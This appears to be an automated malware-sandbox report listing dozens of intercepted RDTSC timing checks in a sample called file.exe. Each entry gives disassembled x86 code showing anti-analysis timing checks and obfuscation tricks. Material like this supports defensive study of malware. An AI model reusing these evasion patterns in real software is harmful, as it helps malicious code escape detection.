Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6CED second address: 4C6D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F3D90D93B48h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov bh, 84h 0x00000026 push 00000000h 0x00000028 mov di, si 0x0000002b push 00000000h 0x0000002d jo 00007F3D90D93B55h 0x00000033 jmp 00007F3D90D93B4Fh 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jns 00007F3D90D93B4Ch 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7DDE second address: 4C7DEC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F14 second address: 4C6F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7DEC second address: 4C7DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F18 second address: 4C6F28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F28 second address: 4C6F2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F2D second address: 4C6F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3D90D93B46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3D90D93B55h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F52 second address: 4C6F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3D90F37F16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8C4B second address: 4C8C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F5C second address: 4C6F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8C59 second address: 4C8C5F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7038 second address: 4C7044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3D90F37F1Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8C5F second address: 4C8CCC instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90D93B4Ch 0x00000008 ja 00007F3D90D93B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 jmp 00007F3D90D93B56h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F3D90D93B48h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 mov ebx, 0840AD90h 0x0000003a mov edi, dword ptr [ebp+122D261Dh] 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 ja 00007F3D90D93B4Ah 0x00000048 push eax 0x00000049 jc 00007F3D90D93B4Eh 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8E9A second address: 4C8F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F3D90F37F23h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F3D90F37F18h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov dword ptr [ebp+122D1F15h], ebx 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c jmp 00007F3D90F37F28h 0x00000041 mov eax, dword ptr [ebp+122D0E31h] 0x00000047 clc 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007F3D90F37F18h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 mov edi, dword ptr [ebp+122D2CCCh] 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F3D90F37F28h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9E6F second address: 4C9E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9E73 second address: 4C9E8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90F37F1Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9E8B second address: 4C9F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add ebx, dword ptr [ebp+122D3939h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, esi 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F3D90D93B48h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a or edi, dword ptr [ebp+122D2D1Fh] 0x00000040 mov eax, dword ptr [ebp+122D1171h] 0x00000046 mov dword ptr [ebp+122D18AAh], esi 0x0000004c push FFFFFFFFh 0x0000004e mov edi, dword ptr [ebp+122D3C09h] 0x00000054 nop 0x00000055 jmp 00007F3D90D93B53h 0x0000005a push eax 0x0000005b pushad 0x0000005c jg 00007F3D90D93B4Ch 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD379 second address: 4CD37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD4EE second address: 4CD4FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE6F3 second address: 4CE6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D14D5 second address: 4D1520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3D90D93B58h 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F3D90D93B4Ch 0x00000011 push 00000000h 0x00000013 xor edi, dword ptr [ebp+122D3C69h] 0x00000019 push 00000000h 0x0000001b mov bx, 89BAh 0x0000001f cmc 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F3D90D93B4Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D257C second address: 4D259D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3D90F37F1Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D259D second address: 4D25A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D0670 second address: 4D0676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D1680 second address: 4D1702 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F3D90D93B50h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F3D90D93B48h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 jl 00007F3D90D93B52h 0x00000036 jl 00007F3D90D93B4Ch 0x0000003c or edi, dword ptr [ebp+122D2D8Ah] 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 sub dword ptr [ebp+1247B27Ch], eax 0x0000004f mov eax, dword ptr [ebp+122D0931h] 0x00000055 push edi 0x00000056 pushad 0x00000057 xor ebx, 7EFE7911h 0x0000005d add dword ptr [ebp+122D2C4Ah], ecx 0x00000063 popad 0x00000064 pop edi 0x00000065 push FFFFFFFFh 0x00000067 push eax 0x00000068 push esi 0x00000069 push esi 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF6C9 second address: 4CF6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D0715 second address: 4D071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D3466 second address: 4D34F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov di, 5511h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3D90F37F18h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov ebx, 2FA471FEh 0x0000002e call 00007F3D90F37F1Dh 0x00000033 mov ebx, ecx 0x00000035 pop ebx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F3D90F37F18h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D2B94h] 0x00000058 xchg eax, esi 0x00000059 push edi 0x0000005a jmp 00007F3D90F37F1Dh 0x0000005f pop edi 0x00000060 push eax 0x00000061 pushad 0x00000062 ja 00007F3D90F37F18h 0x00000068 push eax 0x00000069 push edx 0x0000006a push edi 0x0000006b pop edi 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D071B second address: 4D073B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F3D90D93B4Ah 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4393 second address: 4D43A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F3D90F37F16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D360D second address: 4D362A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b js 00007F3D90D93B46h 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F3D90D93B46h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D43A0 second address: 4D43E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, dx 0x0000000b push 00000000h 0x0000000d jno 00007F3D90F37F16h 0x00000013 push 00000000h 0x00000015 mov ebx, 3FD00209h 0x0000001a xchg eax, esi 0x0000001b jmp 00007F3D90F37F1Bh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007F3D90F37F1Fh 0x00000029 jg 00007F3D90F37F16h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D362A second address: 4D362E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D370A second address: 4D370F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4585 second address: 4D459E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F3D90D93B46h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 je 00007F3D90D93B46h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D5492 second address: 4D5496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D467E second address: 4D46AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3D90D93B50h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D644A second address: 4D6450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E00CD second address: 4E00D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E01F3 second address: 4E01F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E01F7 second address: 4E0203 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3D90D93B46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E0203 second address: 4E021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F3D90F37F16h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E021A second address: 4E021E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E0385 second address: 4E0398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E0398 second address: 4E039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E04C3 second address: 4E04C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E04C9 second address: 4E04CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E04CF second address: 4E04D9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3D90F37F2Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E04D9 second address: 4E0508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B53h 0x00000009 jp 00007F3D90D93B4Ch 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jg 00007F3D90D93B5Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E5D84 second address: 4E5D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E5D9E second address: 4E5DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA719 second address: 4EA71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EAE15 second address: 4EAE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EAE1B second address: 4EAE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D90F37F1Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB26D second address: 4EB284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90D93B52h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB284 second address: 4EB28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB28F second address: 4EB293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB7A8 second address: 4EB7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3D90F37F16h 0x0000000a jng 00007F3D90F37F16h 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB7BD second address: 4EB7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F3D90D93B58h 0x0000000a push ecx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB7E1 second address: 4EB7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 470A4C second address: 470A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B57h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1725 second address: 4F1729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1729 second address: 4F172F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BBE2B second address: 4BBE31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BBFA9 second address: 4BBFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BBFAF second address: 4BBFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BBFB3 second address: 4BBFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0E5 second address: 4BC0EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCA31 second address: 4BCA3B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCA3B second address: 4BCA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3D90F37F16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCA45 second address: 4BCA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A192A second address: 4A192E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A192E second address: 4A193A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3D90D93B46h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0AFC second address: 4F0B18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007F3D90F37F1Bh 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0B18 second address: 4F0B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3D90D93B46h 0x0000000a jmp 00007F3D90D93B54h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0CB6 second address: 4F0CBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0CBB second address: 4F0CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F3D90D93B51h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0CE0 second address: 4F0CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0CE6 second address: 4F0CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5D6E second address: 4F5D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F629C second address: 4F62C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F3D90D93B58h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62C1 second address: 4F62C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
